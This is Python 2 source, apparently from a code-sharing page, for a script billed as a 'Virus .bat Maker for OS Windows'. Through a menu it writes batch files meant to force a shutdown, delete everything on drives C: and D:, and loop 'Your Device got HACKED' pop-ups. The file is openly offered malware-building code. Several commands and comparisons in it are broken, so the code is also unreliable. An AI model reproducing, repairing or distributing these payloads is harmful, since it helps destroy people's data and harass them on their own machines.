xvirus.py 2.7 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102
  1. #!/usr/bin/python
  2. ############################### TOOLS MAKED BY XmintSec
  3. import os
  4. import urllib2
  5. import json
  6. import time
  7. import smtplib
  8. from termcolor import colored, cprint
  9. from base64 import *
  10. ############################### RECODE AUTO JAHANNAM
  11. os.system("reset")
  12. print ("\033[93m __ __ _ _ ____")
  13. print ("\033[93m \ \/ /_ __ ___ (_)_ __ | |_/ ___| ___ ___")
  14. print ("\033[93m \ /| '_ ` _ \| | '_ \| __\___ \ / _ \/ __|")
  15. print ("\033[93m / \| | | | | | | | | | |_ ___) | __/ (__")
  16. print ("\033[93m /_/\_\_| |_| |_|_|_| |_|\__|____/ \___|\___|")
  17. print ("\033[93m -----------------------------------------")
  18. print ("\033[34m [+]TOOLS : Virus .bat Maker for OS Windows")
  19. print ("\033[34m [+]Author : XmintSec")
  20. print ("\033[95m [+]Team : Security Darknet - Anon Cyber Team - Syntax Error Crew")
  21. print ("\033[34m [+]Gmail : xmintsec@gmail.com")
  22. print ("\033[34m Found bug? contact my gmail")
  23. print ("\033[93m -----------------------------------------")
  24. def menu():
  25. print'\33[33m Choose The Selection :'
  26. print'\33[33m -----------------'
  27. print'\33[33m [1] Shutdown'
  28. print'\33[33m [2] Delete all Files Target'
  29. print'\33[33m [3] Summon Text Permanently'
  30. print'\33[33m [4] Exit'
  31. print'\33[33m -----------------'
  32. def shutdown():
  33. thangans = open ("shutdown.bat","w")
  34. virus = """
  35. @echo shutdown -s -t 1 -f
  36. """
  37. thangans.write(virus)
  38. thangans.close
  39. print 'Want Create our Virus? (y/n)'
  40. back=raw_input().upper()
  41. if back=='y':
  42. menu()
  43. else:
  44. exit()
  45. def delete():
  46. thangans = open ("delete.bat","w")
  47. virus = """
  48. @echo off
  49. DEL C: -Y
  50. DEL D: -Y
  51. """
  52. thangans.write(virus)
  53. thangans.close
  54. print 'Want Create our Virus? (y/n)'
  55. back=raw_input().upper()
  56. if back=='y':
  57. menu()
  58. else:
  59. exit()
  60. def summon():
  61. thangans = open ("summon.bat","w")
  62. virus = """
  63. @echo off
  64. :Begin
  65. msg * Your Device got HACKED
  66. msg * Your Device was infected by THAN MALWARE
  67. msg * Re - Install your Device
  68. go to begin
  69. """
  70. thangans.write(virus)
  71. thangans.close
  72. print 'Want Create our Virus? (y/n)'
  73. back=raw_input().upper()
  74. if back=='y':
  75. menu()
  76. else:
  77. exit()
  78. menu()
  79. while 1:
  80. pilih=input('Input Your Selection : ')
  81. if pilih==1:
  82. shutdown()
  83. elif pilih==2:
  84. delete()
  85. elif pilih==3:
  86. summon()
  87. elif pilih==4 :
  88. exit()
  89. else:
  90. print'maaf pilihan anda tidak ada dimenu'
  91. print'sorry, your selection not available on menu'
  92. print'Want Create our Virus? (y/n)'
  93. back=raw_input().upper()
  94. if back=='y':
  95. menu()
  96. else:
  97. exit()